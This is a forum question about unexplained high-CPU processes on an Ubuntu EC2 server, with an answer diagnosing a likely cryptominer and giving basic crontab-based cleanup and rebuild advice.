Unknown processes with high CPU utilization Ubuntu on EC2
By Sarah Smith
I have a Ubuntu instance on EC2 (t3.medium, Ubuntu Server 18.04 LTS) that has been consuming lots of CPU. Their names are not Googleable (just random characters) and does not give any clue on what they are. How can I investigate this? Attached is a screenshot:
I tried killing the processes but after a few minutes it will reoccur. Same after a restart.
1 Answer
Congratulations! You, good sir, is now the owner of a malware infected server.
It's probably some crypto-currency miner.
Generally they tend to make a entry in your crontab.
To check crontab for the ubuntu user, run
sudo crontab -e -u ubuntuRemove any unknown entries, but take note of where they pointed to.
After you've updater your crontab, kill all of the processes, and check crontab again. Then remove the files referenced by crontab using rm.
Reboot, and verify that it does not reappear. Find whatever vulnerability was used to enter, and make sure everything is up to date and secure again, otherwise you'll be reinfected in short order.
I would suggest not doing above, but rather nuking the instance, and starting a new one.
6
